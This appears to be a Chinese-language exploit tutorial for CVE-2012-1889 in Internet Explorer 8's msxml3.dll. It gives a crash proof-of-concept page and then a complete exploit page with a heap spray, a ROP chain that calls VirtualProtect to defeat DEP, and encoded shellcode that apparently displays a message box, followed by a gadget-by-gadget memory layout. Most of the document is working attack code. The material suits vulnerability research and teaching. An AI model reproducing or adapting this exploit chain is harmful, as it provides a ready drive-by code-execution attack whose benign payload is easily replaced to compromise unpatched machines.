|
軟件名稱:Internet Explorer 軟件版本:8.0 漏洞模塊:msxml3.dll 模塊版本:8.90.1101.0 編譯日期:2008年4月14日 |
操作環境:Win7 x86 sp1/JRE 6.0 漏洞編號:CVE-2012-1889(MS12-043) 危害等級:超危 漏洞類型:緩衝區溢出 威脅類型:遠程 |
1. 軟件簡介
Internet Explorer,是微軟公司推出的一款網頁瀏覽器。原稱Microsoft Internet Explorer(6版本以前)和Windows Internet Explorer(7、8、9、10、11版本),簡稱IE。在IE7以前,中文直譯爲“網絡探路者”,但在IE7以後官方便直接俗稱"IE瀏覽器"。
msxml指微軟的xml語言解析器,用來解釋xml語言的。就好像html文本下載到本地,瀏覽器會檢查html的語法,解釋html文本然後顯示出來一樣。要使用xml文件就一定要用到xml parser。
2. 漏洞成因
Microsoft XML Core Services (MSXML)是一組服務,可用JScript、VBScript、Microsoft開發工具編寫的應用構建基於XML的Windows-native應用。
Microsoft XML Core Services 處理內存中的對象的方式中存在一個遠程執行代碼漏洞。如果用戶查看包含特製內容的網站,則該漏洞可能允許遠程執行代碼。Microsoft XML Core Services 3.0、4.0、5.0和6.0版本中存在漏洞,該漏洞源於訪問未初始化內存位置。
3. 利用過程
遠程攻擊者可利用該漏洞藉助特製的web站點,執行任意代碼或導致拒絕服務(內存破壞)。
4. PoC
使用以下代碼保存爲html文件,在windbg條件下打開IE瀏覽器,並運行這個html文件,IE瀏覽器崩潰。
示例代碼:
<html>
<head>
<title>CVE 2012-1889 PoC v2 By:15PB.Com</title>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
<script>
// 獲取名爲15PB的對象,並將其保存到名爲obj15PB實例中
var obj15PB = document.getElementById('15PB').object;
// 初始化數據變量srcImgPath的內容(unescape()是解碼函數)
var srcImgPath = unescape("\u0C0C\u0C0C");
// 構建一個長度爲0x1000[4096*2]字節的數據
while (srcImgPath.length < 0x1000)
srcImgPath += srcImgPath;
// 構建一個長度爲0x1000-10[4088*2]的數據,起始內容爲“\\15PB_Com”
srcImgPath = "\\\\15PB_Com" + srcImgPath;
srcImgPath = srcImgPath.substr(0, 0x1000-10);
// 創建一個圖片元素,並將圖片源路徑設爲srcImgPath
var emtPic = document.createElement("img");
emtPic.src = srcImgPath;
emtPic.nameProp; // 返回當前圖片文件名(載入路徑)
obj15PB.definition(0); // 定義對象(觸發溢出)
</script>
</body>
</html>點擊是
5.Exploit
<html>
<head>
<title>Step2_Accurate_Heap Spray By:15PB.Com</title>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
<script>
// 1. 生成Padding
var cPadding = unescape("\u0C0C\u0C0C");
while (cPadding.length < 0x1000)
cPadding += cPadding;
cPadding = cPadding.substring(0, 0x5F6);
// 2. 製作ROP
var cROP = unescape(
"\u1124\u7c34" + //0c0c0c0c //ret Addr
"\u10fd\u7c34" + //0c0c0c10 //pop ebp Addr
"\u8b05\u7c34" + //0c0c0c14 //xchg eax,esp # ret Addr
"\u1124\u7c34" + //0c0c0c18 //ret Addr
"\u1124\u7c34" + //0c0c0c1c //ret Addr
"\u1124\u7c34" + //0c0c0c20 //ret Addr
"\u1124\u7c34" + //0c0c0c24 //ret Addr
//關鍵ROP
"\u1123\u7c34" + //0c0c0c28 //POP EDI # RETN
"\u1124\u7c34" + //0c0c0c2c //RETN (ROP NOP)
"\u1920\u7c34" + //0c0c0c30 //POP ESI # RETN
"\u15a2\u7c34" + //0c0c0c34 //JMP [EAX]
"\u10fd\u7c34" + //0c0c0c38 //POP EBP #RETN
"\u0c64\u0c0c" + //0c0c0c3c //RETN TO PAYLOAD
"\u28b8\u7c34" + //0c0c0c40 //POP EBX #RETN
"\u1000\u0000" + //0c0c0c44 //dwSize = 0x1000
"\u39fa\u7c34" + //0c0c0c48 //POP EDX #RETN
"\u0040\u0000" + //0c0c0c4c //NewProtect = 0x40
"\u10c3\u7c34" + //0c0c0c50 //POP ECX #RETN
"\ucfff\u7c38" + //0c0c0c54 //OldProtect
"\u4cc1\u7c34" + //0c0c0c58 //POP EAX #RETN
"\uA151\u7C37" + //0c0c0c5c //IAT->VirtualProtect Addr //40-ef=51
"\u8c81\u7c37" //0c0c0c60 //PUSHAD # ADD AL,0ef #RETN
);
// 3. 準備好Payload(unescape()是解碼函數)
var cPayload = unescape(
"\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +
"\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +
"\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +
"\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +
"\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +
"\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +
"\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +
"\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +
"\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +
"\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +
"\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +
"\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +
"\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +
"\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +
"\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +
"\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +
"\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +
"\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +
"\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +
"\uC25D\u0010\u0000");
// 4. 準備好FillData
// 4.1 計算填充滑板指令數據的大小(都除2是因爲length返回的是Unicode的字符個數)
var nSlideSize = 0x1000; // 一個滑板指令塊的大小(4KB)
var nPadSize = cPadding.length; // Padding大小
var nR2LSize = cROP.length; // Ret2Libc大小
var nPySize = cPayload.length; // Shellcode大小
var nFillSize = nSlideSize-nPadSize-nR2LSize-nPySize;
// 4.2 製作好一塊填充數據
var cFillData = unescape("\u0C0C\u0C0C");
while (cFillData.length < nSlideSize)
cFillData += cFillData;
cFillData = cFillData.substring(0, nFillSize);
// 5. 構建滑板指令數據塊
var nBlockSize = 0x40000; // 256KB
var cBlock = cPadding + cROP + cPayload + cFillData;
while (cBlock.length < nBlockSize)
cBlock += cBlock;
cBlock = cBlock.substring(2, nBlockSize-0x21);
// 6. 填充200MB的內存區域(申請800塊256KB大小的滑板數據區),試圖覆蓋0x0C0C0C0C
// 區域,每塊滑板數據均由 滑板數據+Shellcode 組成,這樣只要任意一塊滑板數據
// 正好落在0x0C0C0C0C處,大量無用的“OR AL,0C”就會將執行流程引到滑板數據區
// 後面的Shellcode處,進而執行Shellcode。
var cSlideData = new Array();
for (var i = 0; i < 800; i++)
cSlideData[i] = cBlock.substr(0, cBlock.length);
// 7. 觸發CVE 2012-1889漏洞
// 7.1 獲取名爲15PB的XML對象,並將其保存到名爲obj15PB實例中
var obj15PB = document.getElementById('15PB').object;
// 7.2 構建一個長度爲0x1000-10=8182,起始內容爲“\\15PB_Com”字節的數據
var srcImgPath = unescape("\u0C0C\u0C08");
while (srcImgPath.length < 0x1000)
srcImgPath += srcImgPath;
srcImgPath = "\\\\15PB_Com" + srcImgPath;
srcImgPath = srcImgPath.substr(0, 0x1000-10);
// 7.3 創建一個圖片元素,並將圖片源路徑設爲srcImgPath,並返回當前圖片文件名
var emtPic = document.createElement("img");
emtPic.src = srcImgPath;
emtPic.nameProp;
// 7.4 定義對象obj15PB(觸發溢出)
obj15PB.definition(0);
</script></body></html>
執行Exploit網頁後在msxml3.dll中有以下彙編代碼:
mov eax,[ebp-14h] //eax=0c0c0c08h
……
mov esi,eax //esi=0c0c0c08h
……
mov ecx,[eax] //ecx=[0x0c0c0c08] => 0c0c0c0ch
……
call [ecx+18h] //call [0x0c0c0c24]
……
mov eax,[esi] //eax=[0x0c0c0c08] => 0c0c0c0ch
……
call [eax+8h] //call [0x0c0c0c14]
0x0c0c0c00 0c0c0c0ch
0x0c0c0c04 0c0c0c0ch
0x0c0c0c08 0c0c0c0ch
0x0c0c0c0C 0c0c0c0ch
0x0c0c0c10 retn Addr <-esp Step_3
0x0c0c0c14 pop exx # retn Addr Step_4(直接執行下下一步)
0x0c0c0c18 xchg eax,esp # retn Addr Step_2(關鍵步驟)
0x0c0c0c1C retn Addr Step_5
0x0c0c0c20 retn Addr Step_6
0x0c0c0c24 retn Addr Step_1 / Step_7
0x0c0c0c28 POP EDI # RETN
0x0c0c0c2c RETN (ROP NOP)
0x0c0c0c30 POP ESI # RETN
0x0c0c0c34 JMP [EAX] //跳轉IAT
0x0c0c0c38 POP EBP #RETN
0x0c0c0c3c retn toPayLoad //構建VirtualProtect的返回地址
0x0c0c0c40 POP EBX #RETN
0x0c0c0c44 dwSize = 0x1000
0x0c0c0c48 POP EDX #RETN
0x0c0c0c4c NewProtect = 0x40
0x0c0c0c50 POP ECX #RETN
0x0c0c0c54 OldProtect
0x0c0c0c58 POP EAX #RETN
0x0c0c0c5c IAT->VirtualProtect Addr //AL-0xef //這裏要保證eax是正確的,所以要讓al減去ef
0x0c0c0c60 PUSHAD # ADD AL,0ef #RETN //剛好esp指向0x0c0c0c64,構建爲VirtualProtect的第一個參數lpAddress
往下面就是PayLoad……
7.結語
觸發漏洞的代碼是JavaScript中最後一句,即後面obj15PB.definition(0)。definition是DOM對象的一個屬性,而且是隻讀的屬性,不可以把屬性當作函數來使用並往裏面傳遞參數。
附:
彙編中PUSHAD的壓入順序是EAX、ECX、EDX、EBX、原始 ESP、EBP、ESI 及 EDI.